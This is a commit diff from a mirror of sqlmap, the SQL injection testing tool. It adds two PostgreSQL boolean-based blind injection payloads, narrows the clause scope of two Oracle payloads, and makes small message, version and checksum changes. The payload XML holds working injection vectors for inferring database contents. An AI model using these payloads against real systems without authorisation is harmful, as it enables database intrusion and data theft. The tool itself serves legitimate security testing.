mirror of
				https://github.com/sqlmapproject/sqlmap.git
				synced 2025-10-25 13:11:00 +03:00 
			
		
		
		
	Adding two new payloads and minor cosmetics
This commit is contained in:
		
							parent
							
								
									fb8afc6add
								
							
						
					
					
						commit
						fee5c7bd7c
					
				|  | @ -1330,7 +1330,7 @@ def parseTargetDirect(): | |||
|                 else: | ||||
|                     errMsg = "sqlmap requires '%s' third-party library " % data[1] | ||||
|                     errMsg += "in order to directly connect to the DBMS " | ||||
|                     errMsg += "%s. You can download it from '%s'" % (dbmsName, data[2]) | ||||
|                     errMsg += "'%s'. You can download it from '%s'" % (dbmsName, data[2]) | ||||
|                     errMsg += ". Alternative is to use a package 'python-sqlalchemy' " | ||||
|                     errMsg += "with support for dialect '%s' installed" % data[3] | ||||
|                     raise SqlmapMissingDependence(errMsg) | ||||
|  |  | |||
|  | @ -20,7 +20,7 @@ from lib.core.enums import OS | |||
| from lib.core.revision import getRevisionNumber | ||||
| 
 | ||||
| # sqlmap version (<major>.<minor>.<month>.<monthly commit>) | ||||
| VERSION = "1.0.10.7" | ||||
| VERSION = "1.0.10.8" | ||||
| REVISION = getRevisionNumber() | ||||
| TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" | ||||
| TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} | ||||
|  |  | |||
|  | @ -49,7 +49,7 @@ def checkDependencies(): | |||
|         except ImportError: | ||||
|             warnMsg = "sqlmap requires '%s' third-party library " % data[1] | ||||
|             warnMsg += "in order to directly connect to the DBMS " | ||||
|             warnMsg += "%s. Download from %s" % (dbmsName, data[2]) | ||||
|             warnMsg += "'%s'. Download from %s" % (dbmsName, data[2]) | ||||
|             logger.warn(warnMsg) | ||||
|             missing_libraries.add(data[1]) | ||||
| 
 | ||||
|  |  | |||
|  | @ -26,7 +26,7 @@ f15544a4c9c365ae8f2f8fa2e3a69aa5  lib/controller/checks.py | |||
| cc9c82cfffd8ee9b25ba3af6284f057e  lib/controller/__init__.py | ||||
| 04f16204c899438dc7599a9a8426bfee  lib/core/agent.py | ||||
| eb0bd28b0bd9fbf67dcc3119116df377  lib/core/bigarray.py | ||||
| b1e2ccdeea8bf12feb839d403dc05796  lib/core/common.py | ||||
| e8f1325ebcd7c7c823c53fead7c02b1d  lib/core/common.py | ||||
| 5680d0c446a3bed5c0f2a0402d031557  lib/core/convert.py | ||||
| e77cca1cb063016f71f6e6bdebf4ec73  lib/core/data.py | ||||
| 1d042f0bc0557d3fd564ea5a46deb77e  lib/core/datatype.py | ||||
|  | @ -45,7 +45,7 @@ e60456db5380840a586654344003d4e6  lib/core/readlineng.py | |||
| 5ef56abb8671c2ca6ceecb208258e360  lib/core/replication.py | ||||
| 99a2b496b9d5b546b335653ca801153f  lib/core/revision.py | ||||
| 7c15dd2777af4dac2c89cab6df17462e  lib/core/session.py | ||||
| 770831663e6aae4e1f8061a4391a746c  lib/core/settings.py | ||||
| 6c366747f3b7c95915502fda96e81778  lib/core/settings.py | ||||
| 7af83e4f18cab6dff5e67840eb65be80  lib/core/shell.py | ||||
| 23657cd7d924e3c6d225719865855827  lib/core/subprocessng.py | ||||
| c3ace7874a536d801f308cf1fd03df99  lib/core/target.py | ||||
|  | @ -101,7 +101,7 @@ f5d6884cdeed28281187c111d3e49e3b  lib/techniques/union/test.py | |||
| 12ce1bb7ee5f1f23f58be12fe9fa8472  lib/techniques/union/use.py | ||||
| 26c1babc6289fac9056f8b21d10f3bb1  lib/utils/api.py | ||||
| 8cdc8c1e663c3b92a756fb7b02cc3c02  lib/utils/crawler.py | ||||
| e30011943692aa2fe7c1185974112bc0  lib/utils/deps.py | ||||
| 84604ae4cf0f31602b412036b51f5dae  lib/utils/deps.py | ||||
| 4dfd3a95e73e806f62372d63bc82511f  lib/utils/getch.py | ||||
| b1e83fc549334fae8f60552dcdad28cb  lib/utils/hashdb.py | ||||
| 0330607242d4f704ae6d7bba5f52ccae  lib/utils/hash.py | ||||
|  | @ -448,7 +448,7 @@ d989813ee377252bca2103cea524c06b  xml/banner/sharepoint.xml | |||
| fb93505ef0ab3b4a20900f3e5625260d  xml/boundaries.xml | ||||
| 535d625cff8418bdc086ab4e1bbf5135  xml/errors.xml | ||||
| a279656ea3fcb85c727249b02f828383  xml/livetests.xml | ||||
| 6df1f1dca6a0ef60b06b173f4132328e  xml/payloads/boolean_blind.xml | ||||
| fc176dfccf83673b89bcbb784b72ab70  xml/payloads/boolean_blind.xml | ||||
| 103a4c9b12c582b24a3fac8147a9c8d4  xml/payloads/error_based.xml | ||||
| 06b1a210b190d52477a9d492443725b5  xml/payloads/inline_query.xml | ||||
| 3194e2688a7576e1f877d5b137f7c260  xml/payloads/stacked_queries.xml | ||||
|  |  | |||
|  | @ -488,11 +488,49 @@ Tag: <test> | |||
|     </test> | ||||
| 
 | ||||
|     <test> | ||||
|         <title>Oracle AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (CTXSYS.DRITHSX.SN)</title> | ||||
|         <title>PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)</title> | ||||
|         <stype>1</stype> | ||||
|         <level>2</level> | ||||
|         <risk>1</risk> | ||||
|         <clause>1,2,3</clause> | ||||
|         <clause>1</clause> | ||||
|         <where>1</where> | ||||
|         <vector>AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL</vector> | ||||
|         <request> | ||||
|             <payload>AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL</payload> | ||||
|         </request> | ||||
|         <response> | ||||
|             <comparison>AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL</comparison> | ||||
|         </response> | ||||
|         <details> | ||||
|             <dbms>PostgreSQL</dbms> | ||||
|         </details> | ||||
|     </test> | ||||
| 
 | ||||
|     <test> | ||||
|         <title>PostgreSQL OR boolean-based blind - WHERE or HAVING clause (CAST)</title> | ||||
|         <stype>1</stype> | ||||
|         <level>3</level> | ||||
|         <risk>3</risk> | ||||
|         <clause>1</clause> | ||||
|         <where>2</where> | ||||
|         <vector>OR (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL</vector> | ||||
|         <request> | ||||
|             <payload>OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL</payload> | ||||
|         </request> | ||||
|         <response> | ||||
|             <comparison>OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL</comparison> | ||||
|         </response> | ||||
|         <details> | ||||
|             <dbms>PostgreSQL</dbms> | ||||
|         </details> | ||||
|     </test> | ||||
| 
 | ||||
|     <test> | ||||
|         <title>Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title> | ||||
|         <stype>1</stype> | ||||
|         <level>2</level> | ||||
|         <risk>1</risk> | ||||
|         <clause>1</clause> | ||||
|         <where>1</where> | ||||
|         <vector>AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL</vector> | ||||
|         <request> | ||||
|  | @ -507,12 +545,12 @@ Tag: <test> | |||
|     </test> | ||||
| 
 | ||||
|     <test> | ||||
|         <title>Oracle OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (CTXSYS.DRITHSX.SN)</title> | ||||
|         <title>Oracle OR boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title> | ||||
|         <stype>1</stype> | ||||
|         <level>3</level> | ||||
|         <risk>3</risk> | ||||
|         <clause>1,2,3</clause> | ||||
|         <where>1</where> | ||||
|         <clause>1</clause> | ||||
|         <where>2</where> | ||||
|         <vector>OR (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL</vector> | ||||
|         <request> | ||||
|             <payload>OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL</payload> | ||||
|  |  | |||
		Loading…
	
		Reference in New Issue
	
	Block a user